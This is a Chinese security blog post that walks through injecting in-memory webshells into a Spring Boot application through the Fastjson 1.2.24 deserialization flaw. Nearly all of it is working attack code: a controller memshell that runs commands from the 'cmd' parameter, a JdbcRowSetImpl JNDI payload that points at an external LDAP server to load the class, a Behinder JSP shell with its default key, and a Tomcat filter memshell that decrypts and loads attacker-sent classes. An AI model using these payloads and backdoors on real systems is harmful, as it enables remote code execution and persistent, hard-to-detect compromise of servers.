spring打入filter内存马+冰蝎成功

最新推荐文章于 2024-05-24 15:54:54 发布
最新推荐文章于 2024-05-24 15:54:54 发布
阅读量1.3k 收藏 1
点赞数
文章标签: java web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/132551042
版权

环境:
springboot版本2.4.5

<parent>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-parent</artifactId>
    <version>2.4.5</version>
    <relativePath/> <!-- lookup parent from repository -->
</parent>

fastjson版本1.2.24

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>

Test.java(内存马)

import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.*;
import java.lang.reflect.Method;

public class Test {
    public Test() throws ClassNotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException {
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

        RequestMappingHandlerMapping r = context.getBean(RequestMappingHandlerMapping.class);

        Method method = Test.class.getDeclaredMethod("test", HttpServletRequest.class, HttpServletResponse.class);
        PatternsRequestCondition url = new PatternsRequestCondition("/hahaha");
        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
        r.registerMapping(info, new Test("aaa"), method);
    }

    private Test(String aa){
        // 不这样的话,上面22行会一直重复创建Test()对象,导致内存溢出
    }

    public void test(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String cmd = request.getParameter("cmd");
        if(cmd != null){
            Process exec = Runtime.getRuntime().exec(cmd);
            InputStream inputStream = exec.getInputStream();
            DataInputStream dataInputStream = new DataInputStream(inputStream);
            String disr = dataInputStream.readLine();
            while ( disr != null ) {
                response.getWriter().write(disr);
                disr = dataInputStream.readLine();
            }
        }
        else {
            response.getWriter().write("ADD CONTROLLER");
        }
    }
}

POST /test/hello HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/x-www-form-urlencoded
Content-Length: 283

json={
    "a":
    {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b":
    {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://116.xx.xx.xx:8888/Test",
        "autoCommit": true
    }
}

在这里插入图片描述
在这里插入图片描述
可以看的spring内存马注入成功
注意springboot版本过高注入失败,会报错

我们版本不变,换个内存马再打一遍
在这里插入图片描述
可以看到报错了,报错为
Servlet.service() for servlet [dispatcherServlet] in context with path [] threw exception [Request processing failed; nested exception is com.alibaba.fastjson.JSONException: set property error, autoCommit] with root cause

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

BehinderFilter_bx2.java:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Field;
import org.apache.catalina.core.StandardContext;
import java.lang.reflect.InvocationTargetException;
import java.io.IOException;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import java.lang.reflect.Constructor;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.Context;
import javax.servlet.*;
import java.lang.reflect.Method;
import java.util.*;
import javax.crypto.*;
import javax.crypto.spec.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;


public class BehinderFilter_bx2 extends AbstractTranslet implements Filter {
    static {
        try {
            final String name = "evil";
            final String URLPattern = "/*";

            WebappClassLoaderBase webappClassLoaderBase =
                    (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            Class<? extends StandardContext> aClass = null;
            try{
                aClass = (Class<? extends StandardContext>) standardContext.getClass().getSuperclass();
                aClass.getDeclaredField("filterConfigs");
            }catch (Exception e){
                aClass = (Class<? extends StandardContext>) standardContext.getClass();
                aClass.getDeclaredField("filterConfigs");
            }
            Field Configs = aClass.getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map) Configs.get(standardContext);

            BehinderFilter_bx2 behinderFilter = new BehinderFilter_bx2();

            FilterDef filterDef = new FilterDef();
            filterDef.setFilter(behinderFilter);
            filterDef.setFilterName(name);
            filterDef.setFilterClass(behinderFilter.getClass().getName());
            /**
             * 将filterDef添加到filterDefs中
             */
            standardContext.addFilterDef(filterDef);

            FilterMap filterMap = new FilterMap();
            filterMap.addURLPattern(URLPattern);
            filterMap.setFilterName(name);
            filterMap.setDispatcher(DispatcherType.REQUEST.name());

            standardContext.addFilterMapBefore(filterMap);

            Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
            constructor.setAccessible(true);
            ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);

            filterConfigs.put(name, filterConfig);
        } catch (NoSuchFieldException ex) {
            ex.printStackTrace();
        } catch (InvocationTargetException ex) {
            ex.printStackTrace();
        } catch (IllegalAccessException ex) {
            ex.printStackTrace();
        } catch (NoSuchMethodException ex) {
            ex.printStackTrace();
        } catch (InstantiationException ex) {
            ex.printStackTrace();
        }
    }


    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {

    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        try {
            System.out.println("Do Filter ......");
            // 获取request和response对象
            HttpServletRequest request = (HttpServletRequest) servletRequest;
            HttpServletResponse response = (HttpServletResponse)servletResponse;
            HttpSession session = request.getSession();

            //create pageContext
            HashMap pageContext = new HashMap();
            pageContext.put("request",request);
            pageContext.put("response",response);
            pageContext.put("session",session);

            if (request.getMethod().equals("POST")) {
                String k = "e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
                session.putValue("u", k);
                Cipher c = Cipher.getInstance("AES");
                c.init(2, new SecretKeySpec(k.getBytes(), "AES"));

                //revision BehinderFilter
                Method method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
                method.setAccessible(true);
                byte[] evilclass_byte = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
                Class evilclass = (Class) method.invoke(this.getClass().getClassLoader(), evilclass_byte,0, evilclass_byte.length);
                evilclass.newInstance().equals(pageContext);
            }
        }catch (Exception e){
            e.printStackTrace();
        }

        filterChain.doFilter(servletRequest, servletResponse);
        System.out.println("doFilter");
    }

    @Override
    public void destroy() {

    }

}

在这里插入图片描述
在这里插入图片描述
效果:
在这里插入图片描述在这里插入图片描述

成功注入冰蝎内存马

番茄酱料
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
中间件内存注入&冰蝎连接(附更改部分代码)1
08-03
2. 冰蝎源码简要分析 (JSP) 3. 修改 1. 分析环境准备 2. 冰蝎源码简要分析 (JSP)
第20篇:改造冰蝎客户端适配JNDIExploit的内存
ABC_123的博客
08-20 2206
Part1 前言JNDIExploit是一款常用的用于JNDI注入利用的工具,其大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于JNDI反序列化漏洞的利用,可直接对出网情况下的JNDI进行回显。JNDIExploit这款工具注入冰蝎内存是经过改造后的冰蝎,网上并没有改造好的与之适配的冰蝎客户端放出来,原版...
结合反序列化注入tomcat内存
最新发布
白帽子凯哥哥的博客
05-24 990
通过前几个内存的学习我们可以知道,将内存写在jsp文件上传并不是传统意义上的内存注入,jsp文件本质上就是一个servlet,servlet会编译成class文件,也会实现文件落地。借用木头师傅的一张图结合反序列化注入内存是动态注入内存的常用方法,然而通过反序列化注入的方式没有jsp文件的request内置类,所以获取回显的方式我们也需要考虑,在此写下这篇文章分析总结反序列化注入的方法细节。读者福利 |CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)
干货|冰蝎、哥斯拉 内存应急排查
m0_60571990的博客
12-29 7264
干货|冰蝎、哥斯拉 内存应急排查
CVE-2022-26134 Confluence 无文件落地的内存注入姿势
qq_40466372的博客
07-06 5526
CVE-2022-26134 Confluence 无文件落地的内存注入
学习了解内存,看这篇就够了!(精华版)_什么是内存
jennycisp的博客
04-11 1040
内存,也被称为无文件,是无文件攻击的一种常用手段。虽然由来已久,但是在此之前并未“大红大紫”。近年来盛行于攻防演练之中,攻防演练从2016年的几家参演单位,到2020年扩充到了几百家参演单位,内存也越来越多的被提起,逐渐成为了攻击方的“必备武器”,针对内存的防护也越来越被重视。内存是无文件攻击的一种技术手段,那我们不得不先简单介绍一下无文件攻击。
Weblogic RCE + confluence RCE + cacti RCE正反向代理靶场
Love&Share
04-07 1621
与实际区别。
spring回显方式在代码层面的复现(内存系列篇十四)
阿道夫的博客
02-13 553
在前面的一章中,主要在理论上进行了各种内存的实现,这里就做为上一篇的补充,自己搭建反序列化的漏洞环境来进行上文中理论上内存注入实践。这是内存系列文章的第十四篇。1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking。
CVE-2022-22947-Spring-Cloud-Gateway 内存POC
03-29
Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE...
springsecurity+oauth2+jwt实现单点登录demo
06-06
该资源是springsecurity+oauth2+jwt实现的单点登录demo,模式为授权码模式,实现自定义登录页面和自定义授权页面。应用数据存在内存中或者存在数据库中(附带数据库表结构),token存储分为数据库或者Redis。demo...
Springboot+SpringSecurity+SpringSession+Redis+Mybatis-Plus+Swwager.zip
11-17
本项目“Springboot+SpringSecurity+SpringSession+Redis+Mybatis-Plus+Swwager”整合了Spring Boot、Spring Security、Spring Session、Redis、Mybatis-Plus以及Swagger等技术,旨在构建一个强大的、安全的、具有...
memshell:Tomcat 冰蝎内存
04-13
Tomcat 无文件冰蝎内存 使用以下命令创建tomcat容器,并将inject.jar,agent.jar复制到容器中。 docker run -d -ti --net host --name tomcat tomcat:8.0.18-jre8 docker cp inject.jar tomcat:/usr/local/tomcat docker cp agent.jar tomcat:/usr/local/tomcat 使用以下命令将其注入到tomcat进程中。 java -jar inject.jar 123 通过behinder.jar连接内存冰蝎,url格式: http://ip:port/1.jsp?pass_the_world=123&model=chopper 密码: rebeyond
releaseBehinderShell:卸载冰蝎内存
04-16
编译 mvn clean package -DskipTests 使用 首先查看机器进程,找到Tomcat或者Weblogic进程ID,如下为查找Tocmat进程ID ps -el | grep org.apache.catalina.startup.Bootstrap 运行卸载内存程序 java -Xbootclasspath/a:$JAVA_HOME/lib/tools.jar -jar releaseBehinderShell-1.0-SNAPSHOT-jar-with-dependencies.jar [pid] 注意 本工具只在Tomcat环境下进行测试通过,weblogic环境未进行测试。 由于使用本工具导致的任何服务器崩溃等一系列问题,与本人无关。
Spring3.0+Hibernate4.0+SpringMVC整合Ext
10-06
压缩包中有2个项目: 1、fes,这项目是整合后的项目,运行这个项目可以看到整合后的效果。 2、ext4,这个项目是用来做ext的公共js库用的,这样不比没个项目都添加ext的js文件,方便开发。 切记将ext4项目部署上去,...
详解SpringCloudGateway内存泄漏问题
08-18
Spring Cloud Gateway 内存泄漏问题分析与解决 Spring Cloud Gateway 是一个基于 Spring Boot 和 Spring WebFlux 构建的API gateway,提供了丰富的路由、负载均衡、熔断、限流、认证等功能。但是在实际应用中,可能...
SpringBoot集成Spring Security实现异常处理+自定义表单登录使用Filter验证【完整源码+数据库】
02-16
在本项目中,我们主要关注的是如何将Spring Boot与Spring Security进行集成,以实现一个具有异常处理和自定义表单登录验证的安全系统。Spring Security是一个强大的安全框架,它提供了多种安全控制,包括用户认证、...
Spring Cloud gateway 三种方式注入内存(详细过程)
pyth0zn的博客
04-19 1024
1.提交请求包的时候一定要注意类路径要写正确,我有好几次不成功都是没写对2.最好用java 1.8 编译字节码,兼容性比较好,不然会出现服务器版本和本地编译不一致的情况CVE-2022-22947 注入哥斯拉内存 – Whwlsfb's Tech BlogSpring Cloud Gateway 注入哥斯拉内存复现 - 国产大熊猫个人空间 - OSCHINA - 中文开源技术交流社区Spring cloud gateway通过SPEL注入内存 | 回忆飘如雪。
学习了解内存,看这篇就够了!(精华版)
热门推荐
MachineGunJoe666
06-21 1万+
目录 介绍: 一、内存简介 1.1 webshell变迁 1.2 如何实现webshell内存 1.3 内存类型 二、背景知识 2.1 Java web三大件 2.2Tomcat 2.3 其他java背景知识 三、内存实现 四、内存检测与排查 4.1源码检测 4.2 内存排查 介绍: 内存,也被称为无文件,是无文件攻击的一种常用手段。虽然由来已久,但是在此之前并未“大红大紫”。近年来盛行于攻防演练之中,攻防演练从2016年的几家参演单位,到2020年扩充到..
利用 Fastjson 注入 Spring 内存,太秀了~
Java技术栈,分享最主流的Java技术
11-18 809
本文仅供参考学习使用。 1 基础 实际上java内存注入已经有很多方式了,我在学习中动手研究并写了一下针对spring mvc应用的内存。 一般来说实现无文件落地的java内存注入,通常是利用反序列化漏洞,所以动手写了一个spring mvc的后端,并直接给了一个fastjson反序列化的页面,在假定的攻击中,通过jndi的利用方式让web端加载恶意类,注入controller。 一切工作都是站在巨人的肩膀上,参考文章均在最后列出。 1.1 fastjson反序列化和JNDI 关于fastjson漏
Spring+Spring-MVC+MySql+JDBC是Java技术吗
05-23
是的,Spring+Spring-MVC+MySql+JDBC是Java技术的一种组合。SpringJava平台上的一个开源框架,Spring-MVC是Spring框架中的一个MVC架构的扩展,MySql是一个开源的关系型数据库管理系统,而JDBC是Java程序连接数据库的标准接口。这种组合通常被用于Java Web应用程序的开发。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值